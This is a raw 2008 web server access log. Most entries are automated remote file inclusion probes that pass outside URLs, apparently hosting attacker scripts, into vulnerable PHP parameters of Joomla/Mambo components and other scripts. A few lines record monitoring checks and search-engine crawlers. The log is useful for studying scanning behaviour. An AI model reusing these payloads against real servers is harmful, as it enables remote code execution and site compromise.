201.238.195.13 - - [02/Sep/2008:00:57:40 -0400] "GET /phphtml.php?htmlclass_path=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
201.238.195.13 - - [02/Sep/2008:00:57:40 -0400] "GET /logs/phphtml.php?htmlclass_path=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
64.59.71.79 - - [02/Sep/2008:00:58:01 -0400] "GET /logs/access_log.Q108082200/phphtml.php?htmlclass_path=http://zuppl.de/documents/id2.txt?? HTTP/1.1" 404 236 "-" "libwww-perl/5.65"
88.158.0.5 - - [02/Sep/2008:00:58:15 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:00:58:15 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:00:58:16 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:00:58:24 -0400] "GET /logs/error_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
209.59.12.99 - - [02/Sep/2008:00:58:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
194.72.238.61 - - [02/Sep/2008:00:58:52 -0400] "HEAD / HTTP/1.1" 200 - "http://www.netcraft.com/survey/" "Mozilla/4.0 (compatible; Netcraft Web Server Survey)"
201.238.195.13 - - [02/Sep/2008:01:01:02 -0400] "GET /logs/access_log.Q108082200/phphtml.php?htmlclass_path=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 236 "-" "libwww-perl/5.79"
212.50.0.218 - - [02/Sep/2008:01:01:25 -0400] "GET /?sourcedir=http://www.fightclub.by/images/banners/hack-id.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
209.59.12.99 - - [02/Sep/2008:01:03:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.232 - - [02/Sep/2008:01:03:42 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L4F19932677B41300A5C807D+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
88.158.0.5 - - [02/Sep/2008:01:03:42 -0400] "GET /logs//e404.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:01:03:42 -0400] "GET //e404.php?DOCUMENT_ROOT=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
66.135.38.88 - - [02/Sep/2008:01:04:06 -0400] "GET /logs/access_log.Q108082200/errors.php?error=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
66.135.38.88 - - [02/Sep/2008:01:04:06 -0400] "GET /errors.php?error=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
66.135.38.88 - - [02/Sep/2008:01:04:06 -0400] "GET /logs/errors.php?error=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
134.159.120.52 - - [02/Sep/2008:01:04:17 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
134.159.120.52 - - [02/Sep/2008:01:04:17 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
134.159.120.52 - - [02/Sep/2008:01:04:19 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
134.159.120.52 - - [02/Sep/2008:01:04:19 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
66.98.192.98 - - [02/Sep/2008:01:04:27 -0400] "GET /logs/access_log.Q108082200/errors.php?error=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
66.98.192.98 - - [02/Sep/2008:01:04:27 -0400] "GET /errors.php?error=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
66.98.192.98 - - [02/Sep/2008:01:04:27 -0400] "GET /logs/errors.php?error=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
201.238.195.13 - - [02/Sep/2008:01:04:47 -0400] "GET /logs/access_log.Q108082000//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://avast4ever.t35.com/TT?? HTTP/1.1" 404 299 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:01:05:09 -0400] "GET /logs/access_log.Q108082200//netcat/require/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:01:05:09 -0400] "GET //netcat/require/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 224 "-" "libwww-perl/5.79"
88.158.0.5 - - [02/Sep/2008:01:05:10 -0400] "GET /logs//netcat/require/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 229 "-" "libwww-perl/5.79"
66.135.38.88 - - [02/Sep/2008:01:05:36 -0400] "GET /logs/access_log.Q108072300/errors.php?error=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
194.135.105.1 - - [02/Sep/2008:01:05:43 -0400] "GET /!rfihttp://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:01:05:43 -0400] "GET /logs/access_log.Q108082000/!rfihttp://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 270 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:01:05:43 -0400] "GET /logs/!rfihttp://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:01:06:12 -0400] "GET /logs/error_log.Q108082100/!rfihttp://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
88.158.0.5 - - [02/Sep/2008:01:06:20 -0400] "GET /logs/access_log.Q108072300//netcat/require/errors.php?error=http://mccrackenfiscalcourt.com/TotalCalendar/id.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
66.98.192.98 - - [02/Sep/2008:01:06:45 -0400] "GET /logs/access_log.Q108072300/errors.php?error=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
66.135.38.88 - - [02/Sep/2008:01:07:19 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.811"
66.135.38.88 - - [02/Sep/2008:01:07:19 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.811"
66.135.38.88 - - [02/Sep/2008:01:07:20 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.811"
66.135.38.88 - - [02/Sep/2008:01:07:28 -0400] "GET /logs/error_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
74.6.8.96 - - [02/Sep/2008:01:08:15 -0400] "GET /logs/error_log.Q107101100 HTTP/1.0" 200 110474 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [02/Sep/2008:01:08:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.135.38.88 - - [02/Sep/2008:01:08:58 -0400] "GET /logs/error_log.Q108051700//appserv/main.php?appserv_root=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 241 "-" "libwww-perl/5.811"
66.135.38.88 - - [02/Sep/2008:01:08:59 -0400] "GET //appserv/main.php?appserv_root=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
66.135.38.88 - - [02/Sep/2008:01:08:59 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 220 "-" "libwww-perl/5.811"
66.135.38.88 - - [02/Sep/2008:01:10:18 -0400] "GET /logs/error_log.Q108081500//index.php?option=com_custompages&cpage=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
66.135.38.88 - - [02/Sep/2008:01:10:20 -0400] "GET //index.php?option=com_custompages&cpage=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
66.135.38.88 - - [02/Sep/2008:01:10:20 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 213 "-" "libwww-perl/5.811"
62.87.154.41 - - [02/Sep/2008:01:11:37 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.geocities.com/cripya/header.jpg? HTTP/1.1" 404 245 "-" "libwww-perl/5.803"
66.98.192.98 - - [02/Sep/2008:01:11:37 -0400] "GET /logs/error_log.Q108051700//appserv/main.php?appserv_root=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 241 "-" "libwww-perl/5.805"
66.98.192.98 - - [02/Sep/2008:01:11:37 -0400] "GET //appserv/main.php?appserv_root=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
66.98.192.98 - - [02/Sep/2008:01:11:38 -0400] "GET /logs//appserv/main.php?appserv_root=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 220 "-" "libwww-perl/5.805"
193.207.106.54 - - [02/Sep/2008:01:12:06 -0400] "GET /logs/access_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
193.207.106.54 - - [02/Sep/2008:01:12:06 -0400] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 216 "-" "libwww-perl/5.79"
193.207.106.54 - - [02/Sep/2008:01:12:06 -0400] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.79"
194.135.105.1 - - [02/Sep/2008:01:12:24 -0400] "GET /logs/access_log.Q108082000//?path%5Bdocroot%5D=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:01:12:24 -0400] "GET //?path%5Bdocroot%5D=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
193.207.106.54 - - [02/Sep/2008:01:12:27 -0400] "GET /logs/error_log.Q108080900//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.79"
194.135.105.1 - - [02/Sep/2008:01:12:24 -0400] "GET /logs//?path%5Bdocroot%5D=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 200 64001 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:01:12:30 -0400] "GET /logs/access_log.Q108082000%20/!rfihttp://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 271 "-" "libwww-perl/5.805"
193.207.106.54 - - [02/Sep/2008:01:12:42 -0400] "GET /logs/access_log.Q108081100//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
194.135.105.1 - - [02/Sep/2008:01:12:44 -0400] "GET /logs/access_log.Q108040800//vwar/backup/errors.php?error=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:01:12:44 -0400] "GET //vwar/backup/errors.php?error=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 221 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:01:12:44 -0400] "GET /logs//vwar/backup/errors.php?error=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
194.135.105.1 - - [02/Sep/2008:01:12:59 -0400] "GET /logs/error_log.Q108061300//vwar/backup/errors.php?error=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.135.38.88 - - [02/Sep/2008:01:13:08 -0400] "GET /logs/access_log.Q108051700//appserv/main.php?appserv_root=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
66.135.38.88 - - [02/Sep/2008:01:13:17 -0400] "GET /logs/access_log.Q108070600//index.php?option=com_custompages&cpage=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 235 "-" "libwww-perl/5.811"
194.135.105.1 - - [02/Sep/2008:01:13:25 -0400] "GET /logs/error_log.Q108052400//?path%5Bdocroot%5D=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Sep/2008:01:13:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
194.135.105.1 - - [02/Sep/2008:01:14:09 -0400] "GET /logs/error_log.Q108081800/!rfihttp://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
74.6.8.96 - - [02/Sep/2008:01:14:26 -0400] "GET /logs/error_log.Q107120100 HTTP/1.0" 200 56350 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
82.194.70.164 - - [02/Sep/2008:01:15:22 -0400] "GET //index.php?option=com_custompages&cpage=http://www.ruralaccess.biz/raid.txt??? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
82.194.70.164 - - [02/Sep/2008:01:15:22 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.ruralaccess.biz/raid.txt??? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
82.194.70.164 - - [02/Sep/2008:01:15:25 -0400] "GET /logs/error_log.Q108081500//index.php?option=com_custompages&cpage=http://www.ruralaccess.biz/raid.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
61.56.146.2 - - [02/Sep/2008:01:15:42 -0400] "GET /?sourcedir=http://manu.freeunlimitedweb.com/id.gif? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
193.110.89.6 - - [02/Sep/2008:01:15:48 -0400] "GET //?custompluginfile[]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 452 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
78.159.107.230 - - [02/Sep/2008:01:15:51 -0400] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 272 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
78.159.107.230 - - [02/Sep/2008:01:15:51 -0400] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 404 277 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)"
193.110.89.6 - - [02/Sep/2008:01:15:48 -0400] "GET /logs//?custompluginfile[]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 48074 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
81.173.252.119 - - [02/Sep/2008:01:17:26 -0400] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamy.bplaced.net/id.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.808"
81.173.252.119 - - [02/Sep/2008:01:17:27 -0400] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamy.bplaced.net/id.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.808"
81.173.252.119 - - [02/Sep/2008:01:17:27 -0400] "GET /logs/access_log.Q108070100/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamy.bplaced.net/id.txt??? HTTP/1.1" 404 259 "-" "libwww-perl/5.808"
66.98.192.98 - - [02/Sep/2008:01:17:43 -0400] "GET /logs/access_log.Q108051700//appserv/main.php?appserv_root=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
82.194.70.164 - - [02/Sep/2008:01:18:04 -0400] "GET /logs/error_log.Q108081500//index.php?option=com_custompages&cpage=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
82.194.70.164 - - [02/Sep/2008:01:18:04 -0400] "GET //index.php?option=com_custompages&cpage=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
82.194.70.164 - - [02/Sep/2008:01:18:04 -0400] "GET /logs//index.php?option=com_custompages&cpage=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 213 "-" "libwww-perl/5.805"
213.165.80.16 - - [02/Sep/2008:01:18:15 -0400] "GET /logs/error_log.Q108080100%20//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
213.165.80.16 - - [02/Sep/2008:01:18:15 -0400] "GET /logs//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
213.165.80.16 - - [02/Sep/2008:01:18:15 -0400] "GET //includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
81.173.252.119 - - [02/Sep/2008:01:18:22 -0400] "GET /logs/error_log.Q108070100/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://jamy.bplaced.net/id.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.808"
74.53.199.146 - - [02/Sep/2008:01:18:30 -0400] "GET /logs/access_log.Q108082300%20//includes/ktedit/toolbar.php?dirDepth=http://www.nwstars.com/readme.txt???? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
216.104.33.42 - - [02/Sep/2008:01:18:55 -0400] "GET /logs//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 223 "-" "libwww-perl/5.811"
216.104.33.42 - - [02/Sep/2008:01:18:55 -0400] "GET //includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 218 "-" "libwww-perl/5.811"
216.104.33.42 - - [02/Sep/2008:01:18:55 -0400] "GET /logs/error_log.Q108080100//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
216.104.33.42 - - [02/Sep/2008:01:18:57 -0400] "GET /logs/error_log.Q108080200//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 244 "-" "libwww-perl/5.811"
70.84.193.130 - - [02/Sep/2008:01:19:01 -0400] "GET /logs/access_log.Q108082000//include.php?path[docroot]=http://geocities.com/penjahat_lase/scan/naijaid.txt?? HTTP/1.1" 404 237 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.84.193.130 - - [02/Sep/2008:01:19:01 -0400] "GET //include.php?path[docroot]=http://geocities.com/penjahat_lase/scan/naijaid.txt?? HTTP/1.1" 404 210 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"
70.84.193.130 - - [02/Sep/2008:01:19:15 -0400] "GET /logs/access_log.Q108082000//include.php?path[docroot]=http://geocities.com/penjahat_lase/scan/naijaid.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
70.84.193.130 - - [02/Sep/2008:01:19:15 -0400] "GET //include.php?path[docroot]=http://geocities.com/penjahat_lase/scan/naijaid.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.811"
70.84.193.130 - - [02/Sep/2008:01:19:15 -0400] "GET /logs//include.php?path[docroot]=http://geocities.com/penjahat_lase/scan/naijaid.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
82.194.70.164 - - [02/Sep/2008:01:19:22 -0400] "GET /logs/error_log.Q108070600//index.php?option=com_custompages&cpage=http://www.ruralaccess.biz/raid.txt??? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
65.36.166.240 - - [02/Sep/2008:01:19:26 -0400] "GET /logs/error_log.Q108051800/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:01:19:26 -0400] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:01:19:27 -0400] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
209.59.12.99 - - [02/Sep/2008:01:19:44 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.165.80.16 - - [02/Sep/2008:01:19:45 -0400] "GET /logs/error_log.Q108071900//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
213.165.80.16 - - [02/Sep/2008:01:19:46 -0400] "GET /logs/error_log.Q108080100//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
87.248.163.41 - - [02/Sep/2008:01:19:51 -0400] "GET /logs/error_log.Q108080100//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
87.248.163.41 - - [02/Sep/2008:01:20:01 -0400] "GET //includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 218 "-" "libwww-perl/5.805"
87.248.163.41 - - [02/Sep/2008:01:20:01 -0400] "GET /logs//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 223 "-" "libwww-perl/5.805"
87.248.163.41 - - [02/Sep/2008:01:20:04 -0400] "GET /logs/error_log.Q108080200//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
83.96.139.40 - - [02/Sep/2008:01:20:39 -0400] "GET /logs/error_log.Q108052700//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:01:20:39 -0400] "GET //includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:01:20:39 -0400] "GET /logs//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:01:20:41 -0400] "GET /logs/access_log.Q108071900//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:01:20:45 -0400] "GET /logs/error_log.Q108052700//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:01:20:45 -0400] "GET //includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 218 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:01:20:46 -0400] "GET /logs//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 223 "-" "libwww-perl/5.79"
83.96.139.40 - - [02/Sep/2008:01:20:46 -0400] "GET /logs/access_log.Q108071900//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
194.135.105.1 - - [02/Sep/2008:01:21:04 -0400] "GET /logs/error_log.Q108082100%20//?path%5Bdocroot%5D=http://www.tshirtmagliette.com/lnt/id.txt?? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
216.104.33.42 - - [02/Sep/2008:01:21:20 -0400] "GET /logs/error_log.Q108080100%20//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 245 "-" "libwww-perl/5.811"
65.36.166.240 - - [02/Sep/2008:01:21:46 -0400] "GET /logs/error_log.Q108051800/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 233 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:01:21:46 -0400] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
65.36.166.240 - - [02/Sep/2008:01:21:46 -0400] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
70.84.193.130 - - [02/Sep/2008:01:22:29 -0400] "GET /logs/access_log.Q108082000//include.php?path[docroot]=http://geocities.com/penjahat_lase/scan/bigdozid.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
70.84.193.130 - - [02/Sep/2008:01:22:29 -0400] "GET //include.php?path[docroot]=http://geocities.com/penjahat_lase/scan/bigdozid.txt??? HTTP/1.1" 404 210 "-" "libwww-perl/5.811"
70.84.193.130 - - [02/Sep/2008:01:22:29 -0400] "GET /logs//include.php?path[docroot]=http://geocities.com/penjahat_lase/scan/bigdozid.txt??? HTTP/1.1" 404 215 "-" "libwww-perl/5.811"
87.248.163.41 - - [02/Sep/2008:01:23:01 -0400] "GET /logs/error_log.Q108080100%20//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
83.96.139.40 - - [02/Sep/2008:01:24:12 -0400] "GET /logs/error_log.Q108080100%20//includes/header.php?systempath=http://tb4fun.t35.com/id.gif??? HTTP/1.1" 404 245 "-" "libwww-perl/5.79"
74.6.8.96 - - [02/Sep/2008:01:24:23 -0400] "GET /images/ HTTP/1.0" 200 49338 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [02/Sep/2008:01:24:59 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.186.15.66 - - [02/Sep/2008:01:26:03 -0400] "GET /logs//?custompluginfile[]=http://weblime.ru/seahorse/mambo??? HTTP/1.1" 200 64001 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
82.194.70.164 - - [02/Sep/2008:01:26:07 -0400] "GET /logs/error_log.Q108070600//index.php?option=com_custompages&cpage=http://www.rockwellpta.org/fav.ico?? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
